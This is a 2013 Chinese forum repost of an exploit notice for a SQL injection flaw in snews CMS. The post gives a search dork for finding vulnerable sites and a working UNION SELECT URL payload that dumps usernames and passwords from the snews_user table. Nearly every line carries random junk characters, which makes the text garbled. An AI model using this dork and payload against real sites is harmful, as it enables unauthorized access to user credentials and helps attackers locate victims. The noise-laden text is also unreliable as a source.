标题: CMS snews SQL Injection Vulnerability
. D1 |! A; T/ A' F; p0 C# z作者: By onestree4 w4 S3 L% W9 y- ?4 D
下载地址 : http://snewscms.com/
9 h( I. w5 x" K) T4 z# I6 c0 g' M4 ?测试平台 : ubuntu 12.10 / win 77 B1 {) |4 p t$ C5 C/ f: U
关键词: inurl:"tanyakan pada rumput yang bergoyang"; r' s0 z- i4 A# K
6 c' K% B2 s1 U
+ F# ~* Q9 ~6 h5 V+ _- a" q6 o3 e*************************************************************
% c5 z7 i6 F; a2 L- G) R , u4 s8 B3 j; B$ K/ F
SQL poc:
- \3 C f0 r! N! s7 o4 |
2 t, J* N9 N+ \5 qhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
/ F) R9 d# G% a% f1 f6 [! m ( h) v# C( p1 ^% J
示例
4 D4 o; f7 |# N2 e0 A$ I5 @' y7 b
, K; K1 u+ i4 W+ l, Qhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
( u% Y' w! e% ^* V" \- f r8 i ; w) P+ b3 B. i7 J
& h$ ~' {: b" Z
致谢:
w) O& }: i. T' s; ^4 s ; x( A6 t% v f
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell3 ]1 k8 |) W. a) y+ e+ P
; m% A: g2 J, G9 S! b
indonesiancoder - moeslimh4x0r - go-coder8 v/ U, w2 n' L& u- M/ d$ D3 x
' c% _2 V, T! X/ s' tspesial my hunny :*: Q# }# q' j& C# m6 p
|
发表于 2013-1-23 08:55:06
收藏
支持
反对